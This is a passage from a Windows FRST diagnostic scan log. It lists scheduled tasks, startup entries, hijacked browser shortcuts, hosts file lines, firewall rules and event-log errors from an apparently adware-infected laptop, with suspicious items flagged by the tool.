Task: {6B6A2BE2-8A42-4CCE-96D1-DCDE0AA16594} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {6CFB64B8-C96E-4505-B19D-05BFFFDB4366} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-09] (Microsoft Corporation)
Task: {6D890055-866E-4872-979D-B8AB3884F1DC} - System32\Tasks\WMMAWVKOLXONAOYC => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
Task: {7F54B173-73A7-455D-B8D3-05CDBEB04D24} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {81C671AC-4BCA-4B4C-B16A-DA9DC94B2032} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {869A0025-9207-4E47-A0E0-83ACF33323CB} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe
Task: {874B492C-C094-4938-A93E-0F5141822989} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {8FD417A1-EAB1-4416-AFED-D43B138420F6} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {974DD040-169D-46B7-B08A-60E9035DA668} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {A7A740CC-1533-48ED-98D6-67AEE41F1954} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK
Task: {A81D9481-C8A7-47F7-A447-0ACE98E4FAF4} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {AB264965-3447-457B-AC17-BEE07AFCF056} - System32\Tasks\Microsoft\Windows\Media Center\Extender\Update media permissions for Mcx1-RONIN-LAPTOP => C:\Windows\ehome\McxTask.exe
Task: {AF19F91F-CBDD-4187-8FA0-9B762E84BFB5} - System32\Tasks\Lhsorj => C:\PROGRA~1\GROOVE~1\Jascusjh.bat
Task: {BE0F7D0B-3323-406F-AAEF-1A12388A1C9C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {C6CF2B0F-A54A-4CCD-88C0-72501BA9267D} - System32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {C84934AC-6228-4A08-9F09-7D7A54133B68} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {C94198D0-0BC7-4528-B38A-B285C7D79AC0} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {CC2E5376-92DF-4854-8C3D-F54EED7D6667} - System32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-470165136-1162808608-978993673-1001 => C:\Program Files (x86)\Real\RealUpgrade\RealUpgrade.exe [2013-04-16] (RealNetworks, Inc.)
Task: {CEAFA10F-5C90-45F6-BCFE-420DFC90526C} - System32\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {D3ACB7DB-7815-42A9-A39F-8D89E1EDF573} - System32\Tasks\Pritc => C:\Users\RoNiN\AppData\Local\Temp\is-TIN56.tmp\print.exe <==== ATTENTION
Task: {D92D97F2-2EDF-4800-82E5-E726F16D0395} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {DF294663-0E97-4583-81A3-6DA69DA846AC} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {E86953B2-7A47-4920-B975-308AAEEA66E9} - System32\Tasks\BJZJKCUBLH1 => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: {ED1A577E-497C-4A70-998F-01B3E908FA9B} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {FAAA50A7-6B6E-4A1A-B40E-B19F2672A919} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {FB119739-D5B0-4725-B8A1-6684820F96FB} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {FC48FBF3-30B8-44A9-9A0B-C568A2FC47CD} - \LuckyTab -> No File <==== ATTENTION
Task: {FC5FE3D1-68A5-4CAD-84FC-0A61139E9C31} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\BJZJKCUBLH1.job => C:\ProgramData\FlashBeat\FlashBeat.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001Core.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskUserS-1-5-21-470165136-1162808608-978993673-1001UA.job => C:\Users\RoNiN\AppData\Local\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\WMMAWVKOLXONAOYC.job => C:\ProgramData\Service1291\Service1291.exe <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
ShortcutWithArgument: C:\Users\RoNiN\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\a41ce5b91aa3166e\MightyText - SMS from PC & Text from Computer.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www%2dsearching.com/?prd=set_epc&s=G3Bzftpbl2,e1b01de2-6ffd-4997-b986-c41b3ac4ed72,
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-07-09 23:33 - 2015-07-09 23:33 - 00028160 _____ () C:\WINDOWS\SYSTEM32\efsext.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00032768 _____ () C:\WINDOWS\SYSTEM32\licensemanagerapi.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00019640 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2015-09-10 01:08 - 2015-09-10 01:08 - 00404480 _____ () C:\WINDOWS\System32\diagtrack_wininternal.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02494712 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2013-10-31 17:47 - 2013-10-31 17:47 - 00954696 _____ () C:\Program Files\Common Files\Apple\Internet Services\ShellStreams64.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 00429056 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2015-12-09 04:52 - 2015-11-25 00:20 - 06569472 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2015-12-09 04:51 - 2015-11-25 00:17 - 00471040 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2015-12-09 04:52 - 2015-11-25 00:17 - 01808384 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2015-10-03 08:23 - 2015-10-03 08:23 - 02274816 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-03-29 18:45 - 2016-03-27 00:55 - 02140824 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libglesv2.dll
2016-03-29 18:45 - 2016-03-27 00:55 - 00097944 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.110\libegl.dll
2009-12-10 04:39 - 2008-09-19 04:03 - 00167936 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\LIBPQ.dll
2009-02-12 20:01 - 2006-11-06 19:18 - 00963584 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\libxml2.dll
2005-07-20 06:48 - 2005-07-20 07:48 - 00059904 _____ () C:\Program Files (x86)\PostgreSQL\8.3\bin\zlib1.dll
2008-02-04 22:43 - 2008-02-04 23:43 - 00027136 _____ () C:\Program Files (x86)\PostgreSQL\8.3\lib\plugins\plugin_debugger.dll
2015-11-17 13:44 - 2015-11-17 13:44 - 00117248 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libaacdec.dll
2015-11-17 13:45 - 2015-11-17 13:45 - 00234496 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libmpgdec.dll
2015-11-17 13:45 - 2015-11-17 13:45 - 00253440 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libid3tag.dll
2015-11-17 13:44 - 2015-11-17 13:44 - 00344064 _____ () C:\Users\RoNiN\AppData\Local\Programs\Google\MusicManager\libaudioenc.dll
2015-09-23 20:35 - 2015-12-29 12:12 - 00020792 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2016-02-10 21:59 - 2016-02-10 21:59 - 00170496 _____ () C:\WINDOWS\assembly\NativeImages_v2.0.50727_32\IsdiInterop\c77312f309b32c7ba095241bb8fa6749\IsdiInterop.ni.dll
2010-06-18 01:06 - 2010-04-13 12:52 - 00058880 _____ () C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IsdiInterop.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Desktop\Natephotobomb.jpg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:SummaryInformation [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:Updt_SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\BBKings Everclear.png:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wddrnote.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:SummaryInformation [151]
AlternateDataStreams: C:\Users\RoNiN\Downloads\wdid.gif:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-19 13:15 - 2016-03-11 19:16 - 00000967 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-470165136-1162808608-978993673-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\RoNiN\Desktop\Pics\Taxi Driver Cinespia.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: ) (ConsentPromptBehaviorUser: ) (EnableLUA: )
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
MSCONFIG\Services: 1198E835-A0AB-4C55-9629-D16AFAD406CB => 3
MSCONFIG\Services: 93530252-4B7E-48FF-9DAA-4D90DB571BBB => 3
MSCONFIG\Services: ACDaemon => 2
MSCONFIG\Services: AdobeARMservice => 2
MSCONFIG\Services: AdobeFlashPlayerUpdateSvc => 3
MSCONFIG\Services: APNMCP => 2
MSCONFIG\Services: Apple Mobile Device => 2
MSCONFIG\Services: AppxikenoZ => 2
MSCONFIG\Services: Bonjour Service => 2
MSCONFIG\Services: BrsHelper => 2
MSCONFIG\Services: btwdins => 2
MSCONFIG\Services: CLDTVHNService => 2
MSCONFIG\Services: CloudPrinter => 2
MSCONFIG\Services: CltMngSvc => 2
MSCONFIG\Services: Dataup => 2
MSCONFIG\Services: dojygici => 2
MSCONFIG\Services: Ejuvde => 2
MSCONFIG\Services: ETDService => 2
MSCONFIG\Services: FirebirdServerMAGIXInstance => 3
MSCONFIG\Services: Gambali => 2
MSCONFIG\Services: groover110320162257 Updater => 2
MSCONFIG\Services: gupdate => 2
MSCONFIG\Services: gupdatem => 3
MSCONFIG\Services: IntuitUpdateServiceV4 => 2
MSCONFIG\Services: iPod Service => 3
MSCONFIG\Services: Jhfuy => 2
MSCONFIG\Services: kBTNrls => 2
MSCONFIG\Services: McciCMService => 2
MSCONFIG\Services: McciCMService64 => 2
MSCONFIG\Services: MPCProtectService => 
MSCONFIG\Services: mwrc => 2
MSCONFIG\Services: Nijgatfy => 2
MSCONFIG\Services: NvNetworkService => 2
MSCONFIG\Services: NvStreamSvc => 2
MSCONFIG\Services: nvsvc => 2
MSCONFIG\Services: RealNetworks Downloader Resolver Service => 2
MSCONFIG\Services: Service Mgr FindSearchWindow => 2
MSCONFIG\Services: shopperz130320161459 Updater => 2
MSCONFIG\Services: SkypeUpdate => 2
MSCONFIG\Services: SMUpd => 2
MSCONFIG\Services: SPBIUpd => 2
MSCONFIG\Services: ss_conn_service => 2
MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: Update Mgr FindSearchWindow => 2
MSCONFIG\Services: wdsvc => 2
MSCONFIG\Services: wrc => 2
MSCONFIG\Services: wucotusy => 2
MSCONFIG\Services: wugixojyzbt => 2
MSCONFIG\Services: YahooAUService => 2
MSCONFIG\Services: zigipyro => 2
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Bluetooth.lnk => C:\windows\pss\Bluetooth.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Microsoft Office.lnk => C:\windows\pss\Microsoft Office.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: Amazon Music => "C:\Users\RoNiN\AppData\Local\Amazon Music\Amazon Music Helper.exe"
MSCONFIG\startupreg: ApplePhotoStreams => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
MSCONFIG\startupreg: AppleSyncNotifier => C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe
MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
MSCONFIG\startupreg: ArcSoft Connection Service => C:\Program Files (x86)\Common Files\ArcSoft\Connection Service\Bin\ACDaemon.exe
MSCONFIG\startupreg: Bing Bar => "C:\Program Files (x86)\MSN Toolbar\Platform\5.0.1423.0\mswinext.exe"
MSCONFIG\startupreg: BitTorrent => "C:\Users\RoNiN\AppData\Roaming\BitTorrent\BitTorrent.exe"  /MINIMIZED
MSCONFIG\startupreg: com.apple.dav.bookmarks.daemon => C:\Program Files (x86)\Common Files\Apple\Internet Services\BookmarkDAV_client.exe
MSCONFIG\startupreg: DAEMON Tools Lite => "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
MSCONFIG\startupreg: HP Photosmart 6510 series (NET) => "C:\Program Files\HP\HP Photosmart 6510 series\Bin\ScanToPCActivationApp.exe" -deviceID "CN1852217505QB:NW" -scfn "HP Photosmart 6510 series (NET)" -AutoStart 1
MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
MSCONFIG\startupreg: Live Update 5 => C:\Program Files (x86)\MSI\Live Update 5\BootStartLiveupdate.exe /reminder
MSCONFIG\startupreg: Microsoft Default Manager => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
MSCONFIG\startupreg: Nikon Message Center 2 => C:\Program Files (x86)\Nikon\Nikon Message Center 2\NkMC2.exe -s
MSCONFIG\startupreg: NvBackend => "C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvBackend.exe"
MSCONFIG\startupreg: PCShowServer => "C:\Users\RoNiN\AppData\Local\DIRECTV Player\PCShowServerPMWrapper.exe"
MSCONFIG\startupreg: QuickTime Task => "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
MSCONFIG\startupreg: ShadowPlay => C:\windows\system32\rundll32.exe C:\windows\system32\nvspcap64.dll,ShadowPlayOnSystemStart
MSCONFIG\startupreg: SkyDrive => "C:\Users\RoNiN\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: TkBellExe => "C:\Users\RoNiN\update\realsched.exe"  -osboot
MSCONFIG\startupreg: TomTomHOME.exe => "C:\Program Files (x86)\TomTom HOME 2\TomTomHOMERunner.exe"
MSCONFIG\startupreg: UpdReg => C:\windows\UpdReg.EXE
HKLM\...\StartupApproved\StartupFolder: => "bsod.hta"
HKLM\...\StartupApproved\StartupFolder: => "AllPCoptimizer.exe.lnk"
HKLM\...\StartupApproved\StartupFolder: => "WebBrowserMixVideoPlayer.lnk"
HKLM\...\StartupApproved\Run: => "THXCfg64"
HKLM\...\StartupApproved\Run: => "IDSCPRODUCT"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "IAStorIcon"
HKLM\...\StartupApproved\Run32: => "TkBellExe"
HKLM\...\StartupApproved\Run32: => "CitrixReceiver"
HKLM\...\StartupApproved\Run32: => "Rt45"
HKLM\...\StartupApproved\Run32: => "BSOD"
HKLM\...\StartupApproved\Run32: => "QwaT1"
HKLM\...\StartupApproved\Run32: => "QwaT4"
HKLM\...\StartupApproved\Run32: => "QwaT5"
HKLM\...\StartupApproved\Run32: => "QwaTgg"
HKLM\...\StartupApproved\Run32: => "QwaT22"
HKLM\...\StartupApproved\Run32: => "QwaT55"
HKLM\...\StartupApproved\Run32: => "QwaT21"
HKLM\...\StartupApproved\Run32: => "QwaT78"
HKLM\...\StartupApproved\Run32: => "QwaT"
HKLM\...\StartupApproved\Run32: => "Rty01"
HKLM\...\StartupApproved\Run32: => "cpx"
HKLM\...\StartupApproved\Run32: => "Rt562@"
HKLM\...\StartupApproved\Run32: => "mpck_en_005030264"
HKLM\...\StartupApproved\Run32: => "msrtn32"
HKLM\...\StartupApproved\Run32: => "ospd_us_037010264"
HKLM\...\StartupApproved\Run32: => "SPDriver"
HKLM\...\StartupApproved\Run32: => "rec_en_222"
HKLM\...\StartupApproved\Run32: => "rec_en_224"
HKLM\...\StartupApproved\Run32: => "rst"
HKLM\...\StartupApproved\Run32: => "sun13"
HKLM\...\StartupApproved\Run32: => "TV"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "Storm Alerts.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\StartupFolder: => "StormAlertsApp.lnk"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "SideSync"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "wdbext"
HKU\S-1-5-21-470165136-1162808608-978993673-1001\...\StartupApproved\Run: => "Windi"
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808
FirewallRules: [MSMQ-Out-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-UDP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-Out-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [MSMQ-In-TCP] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{354199B7-F83D-495C-9D2C-3BA29A4920A5}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{10D8A433-FF54-408D-BD19-8ECAF71549D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{C8C0F0F4-0183-4523-BC93-2E0D15D26F01}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{21F97557-5316-4375-84A5-0B7440C1C0D1}] => (Allow) %systemroot%\system32\mqsvc.exe
FirewallRules: [{F23838C4-65A8-4FC7-B6C2-6B70C4E93033}] => (Allow) LPort=808
FirewallRules: [{B2A68B46-9A65-4A8E-B285-1E48E4A7B975}] => (Allow) C:\Program Files (x86)\Google\Chrome Remote Desktop\50.0.2661.22\remoting_host.exe
FirewallRules: [{BF87AEAD-08C8-402A-835D-3474CD53CC70}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{39A33CB2-D099-4F9A-B02A-951093D131D3}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1BA4519A-A342-4BB7-B7ED-08B0A6CC57F6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{DDA3509A-3FD8-4C09-87F6-F4CB0C7DA6F4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1A44FB89-25DE-4E0A-A722-0E07C2162364}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0113C91F-F729-4DB8-8CD4-21A2E49DD8C6}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
DomainProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Logitech\Logitech Harmony Remote Software 7\HarmonyRemote.exe] => Enabled:Logitech Harmony Remote Software 7
 
==================== Restore Points =========================
 
05-04-2016 13:18:41 Scheduled Checkpoint
09-04-2016 10:34:10 Installed TurboTax 2015 wrapper
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (04/09/2016 04:29:02 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:29:02 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:51 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:28:51 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:41 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:28:41 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:31 PM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (5928) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
 
Error: (04/09/2016 04:28:31 PM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (5928) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ".  The create file operation will fail with error -1032 (0xfffffbf8).
 
Error: (04/09/2016 04:28:27 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3011) (User: NT AUTHORITY)
Description: Unloading the performance counter strings for service WmiApRpl (WmiApRpl) failed. The first DWORD in the Data section contains the error code.
 
Error: (04/09/2016 04:28:27 PM) (Source: Microsoft-Windows-LoadPerf) (EventID: 3012) (User: NT AUTHORITY)
Description: The performance strings in the Performance registry value is corrupted when process Performance extension counter provider. The BaseIndex value from the Performance registry is the first DWORD in the Data section, LastCounter value is the second DWORD in the Data section, and LastHelp value is the third DWORD in the Data section.
 
 
System errors:
=============
Error: (04/09/2016 04:27:45 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYLOCAL SERVICES-1-5-19LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
Description: machine-defaultLocalActivation{C2F03A33-21F5-47FA-B4BB-156362A2F239}{316CDED5-E4AE-4B15-9113-7055D84DCC97}RoNiN-LaptopRoNiNS-1-5-21-470165136-1162808608-978993673-1001LocalHost (Using LRPC)Microsoft.Windows.Cortana_1.4.8.176_neutral_neutral_cw5n1h2txyewyS-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742
 
Error: (04/09/2016 04:27:15 PM) (Source: DCOM) (EventID: 10016) (User: RONIN-LAPTOP)
